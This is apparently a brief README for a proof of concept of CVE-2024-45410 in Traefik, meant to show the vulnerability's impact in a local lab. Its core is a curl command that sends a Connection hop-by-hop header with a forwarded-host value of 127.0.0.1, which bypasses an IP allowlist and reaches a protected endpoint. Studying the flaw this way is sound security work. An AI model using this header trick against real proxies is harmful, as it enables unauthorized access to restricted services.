A proof of concept of traefik CVE to understand the impact
# Proof of Concept of CVE CVE-2024-45410
Resources: https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv
# How-To
Run `curl -i http://flask.localhost/protected`, you shouldn't be able to query the endpoint.
The allowed host are 127.0.0.1, let's use the following query to make a hop-by-hop header via Connection:
`curl -i http://flask.localhost/protected -H "Connection: X-Forwarded-Host" -H "X_Forwarded_Host: 127.0.0.1"`
You should be able to see the protected endpoint
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view